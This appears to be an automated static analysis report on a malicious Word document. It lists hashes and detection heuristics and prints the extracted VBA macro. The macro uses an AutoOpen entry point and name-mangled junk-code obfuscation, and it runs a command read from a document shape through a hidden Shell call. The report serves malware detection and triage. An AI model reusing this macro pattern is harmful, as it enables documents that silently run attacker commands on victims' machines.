Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2b6225d16f07d33f…

MALICIOUS

Office (OLE)

Size: 135.4 KB
Created: 2018-12-07 06:54:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: 11edb16a28367f8bc85b85f637fb1a94
SHA-1: 819a53d9aa5c25cec0f9ad28664ed042f2634115
SHA-256: 2b6225d16f07d33fb329056ef0d2085db72abb53afca2dd8e5227580fecd6898
Risk score: 252

Heuristics (9)

  • ClamAV: Doc.Downloader.Generic-6775737-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6775737-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script:
    LvJJrw = Array(cTpKkrQG, jVVZlNB, AiBuVMkVp, Interaction _
    .Shell(CzJzlfbqw, kljqSJS), PTnbw)
             Set lHubifGQjQtZzvqKiAzfhajw = GAIWfEPlCzKmCHEktkHiRpbP
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
    Attribute VB_Customizable = True
    Sub autoopen()
    vvNVnt
  • Suspicious cmd.exe invocation with execution flag [high] SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4980 bytes
SHA-256: 3c2e9ee09b0c321a3a2b4b348736377d3a1f6a8c5f4e9ecfdf9d0001d529cf07
Detection
ClamAV: No threats found
Obfuscation or payload: likely
129 of 156 identifiers look randomly generated (e.g. 'KjZwcCEQhJXTThuQPBljRlaL') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "IGGtcDJOtz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
vvNVnt
End Sub

Attribute VB_Name = "zcESHSFbijPlo"
Function vvNVnt()
On Error Resume Next
         Set RRPHZLTftPBTjaoYjZkfClY = iidRUUITsqCwVAijUX
      tqPBibsSKKXpjs = driBKYHiaqYrDfqBLikffOj
      qcBzIVAVDcXqBSMblIoLGjon = JMLvNNOLjLiXJZFqCn / CLng(178844538) * 54017798 / Tan(311343) + sRJtXZUsHnOizIpZqOIfSHiD - Cos(186766362) + (229746867 / Int(VDvNiTJUtmTqoqqDuIiaz))
         Set RzmACzsSNnAoShTY = QmsHhPAXWFFqjLpRlurvKjsj
      vmOnWjzKwRkVEkhlcjrmb = bKXhnccmjuJXlcljzVGfi
      FvjKKKhAAwIOLEQpwXiLhqM = wEztjVfvzhEcAcRSEjtMP / CLng(157411380) * 116881590 / Tan(221066029) + JZjzWMOizLFKoTiQMO - Cos(194276880) + (337966864 / Int(pUFQHwzASamSaXwwwdVqtA))
         Set jGjBLTfFfONZEMOEoHVW = zaMRViYcOlYNzSVDFU
      WrLmiuVGVERhERIifUkpp = dQdoMEutBimnAim
      hWAXDXwDUwrkpjUfsPOuJp = RMcDivRQiwsmNpSDFTZUP / CLng(85613513) * 65053829 / Tan(22595994) + OHukPrdsoiKaUOHCf - Cos(84042341) + (263547740 / Int(wGpZMJakUSECYlUoWfOEOtZG))
Set kFRRkAV = IGGtcDJOtz.Shapes(VHRVY + "LlJAwMOdcM" + QtXWi).TextFrame
         Set wkqqOBiizYLXsP = iSozhOWSKzrsZqaYfWGcjnvv
      vKjDlpirfGizDZncRjtWII = XzfAlnTuXtImEnOYHNAuks
      cwTAOHBYhmWLDFotEML = EunjoDHmJIODfYCE / CLng(117745187) * 256234267 / Tan(33964070) + VUazhbLTSTvhYhXhIkLKAP - Cos(97078681) + (170220435 / Int(TjfCkbRHZpjToBNsoTq))
         Set hwaUoaaiThwfspvNjiGQJX = URzBuvzlozSbruB
      BarhiBGrMqJlvbnf = nGDrYfnVvIhaODTf
      FqRpdTLFpDmMpMKmR = nwWcuEMjsYRzmp / CLng(40612913) * 201060158 / Tan(147660387) + OTJmslicAJFwXnzzfhvcvNdu - Cos(175482614) + (256514908 / Int(sQzFLpNYzuAGktSECiwAdA))
CzJzlfbqw = kFRRkAV.ContainingRange + GBaNu + iriazs + zBVwhbu + TiwSLw + spiihn + MmjdSOnS + kwhFfF + cwdba + nhYMBiv
         Set jwzXzShsmwlfiZZjhaho = riMSnhBiRMoIGtn
      ZZNSlizaWzqvbnLn = UoQmFLkfJVjwWYjlWHATWV
      jlvqrGHdBAWlEWbT = cncJPizYKJFfKTPz / CLng(180716831) * 218495419 / Tan(1177788) + UtYCriwAnbOuomqj - Cos(298893810) + (19612424 / Int(HvRhwCzqjHldpbJtjO))
         Set citqXlaYoSGklVr = dVLmnaSUXNbInZLS
      szkkDjjtLwGovNfAsp = PtQBPZTJKRlOHoPsYGcam
      tcbLfbAvIukdCbbvULk = YbajzAjUGtQOwnAoaDu / CLng(286637702) * 59786530 / Tan(98240341) + qiilnQdlRqMDRBrM - Cos(203215401) + (312738601 / Int(oOdVjPbnUQQsQJSjFUOs))
         Set GHuPikIjCbcBjOPYjZvzWalv = jNOnsPQYcoXmzXahFwSPQMo
      zWYapajVwXBXtvJLLdHZrlhB = QQcTjbUYRoWrqjBICn
      VCnKoHDnFOENpWFYKEC = vhwbHnUVtGRpwEjSc / CLng(45096035) * 260235898 / Tan(77548902) + oOKNajUlKrDAUjnDMCAm - Cos(224724247) + (297720558 / Int(zOPkpmwDRqqHSoOjGzkjPOpd))
         Set XsjbUnzborjVzzztCOpjLAsT = YvzAIJcupUXWzrSiWInI
      naBDkUholWANzwszafhH = HibWDXXEprFKzkVwwXo
      GEwXJzvZivcFBEfvZjhwJjv = vCBLXBdIsMTDjENDczZu / CLng(96580352) * 340965387 / Tan(60983121) + EZZPpslXITcGwjCdRUMolcP - Cos(135681590) + (126566658 / Int(TMJBQvtIHzbOSAbwuNcH))
Const kljqSJS = 0
         Set LrbBcwwEuijiOYaioRBuAw = RiwGKNdAjZSGuqvwiLZwu
      OvNbcbhwpmMIKTdrorRizFwS = nsVSibBnRTDsjkCSkjft
      jbSqXifMAJzvvpiMjGLLVs = azEGPPOVQYtHQC / CLng(185481404) * 72743443 / Tan(293498339) + aRJEwnvTGEdUiQnbrr - Cos(125861615) + (181803213 / Int(wloiXChRJDvSoubqW))
         Set vQSpvZsbITtIMknwHAijYnnv = imvjJFuswQIHbRzdj
      imiKjTdviFdXHcWXR = zrzNzQQUfqfiiDsXFJnTFb
      OWpOZJflEAMjoQU = OuLonPzWZfjWNjzhVllqJB / CLng(281503479) * 73511565 / Tan(337822864) + ahVWDGlWZYtnSwX - Cos(124728299) + (270608016 / Int(ZJXVDfLCfddNDAoipRBDbck))
LvJJrw = Array(cTpKkrQG, jVVZlNB, AiBuVMkVp, Interaction _
.Shell(CzJzlfbqw, kljqSJS), PTnbw)
         Set lHubifGQjQtZzvqKiAzfhajw = GAIWfEPlCzKmCHEktkHiRpbP
      qZroSLawfcfztELdouzj = bsuunpYPiQZtoofYwkm
      qXfZmzjwFdudiIPjwtfWC = ALFEEPjErKLziENVInJc / CLng(63994421) * 11937922 / Tan(145307384) + KjZwcCEQhJXTThuQPBljRlaL - Cos(126967446) + (173844491 / Int(rMZXwpJtYqiboFvQYhtBa))
         Set mIOrmWSjjTHHDDk = dGNjuXqbfTCzizZ
      iMPVLjYdBjfOvXRPrzvQf = NPSnMTTUBktWdro
      uwikhOsbjHCnGhDJF = wzDXUEJjiuUYuaacCz / CLng(222065231) * 309045951 / Tan(180879147) + XqHERfOUjkRIsoLWciaBjzGH - Cos(90033389) + (185205422 / Int(diEbKtzcNQQndRJO))
         Set KjTmaBXoZTZLMXrprNwOusZs = lPvJJUpmslCGwvzEFArYWLS
      uLPSKDRGasplcfQwkYT = oivSzKpshUYawSPzFXbpU
      fDFNcaksnzrhnLQzSAOZYGUP = JQStNziRsCrMliOIpjaiPf / CLng(24064572) * 216459937 / Tan(48645193) + bbuWZjqZTJRwaA - Cos(87235745) + (104006726 / Int(IZljRzQjatjYiMlmIVCWVdH))
         Set qmSGWKXNAuZqwRkTzUQbfw = CqqUjSjNQmmsFttDmKQwS
      aRCbCSFJqHuDQPjpovRj = DKYiaFQdROwQXPY
      HPRIHvfwCcdXzWVhl = WHdwcMofZswntAHXjf / CLng(341935004) * 162711251 / Tan(10749388) + faczctjvsQiBsRn - Cos(70429927) + (263218562 / Int(TbVmCOjcPZpqhM))
End Function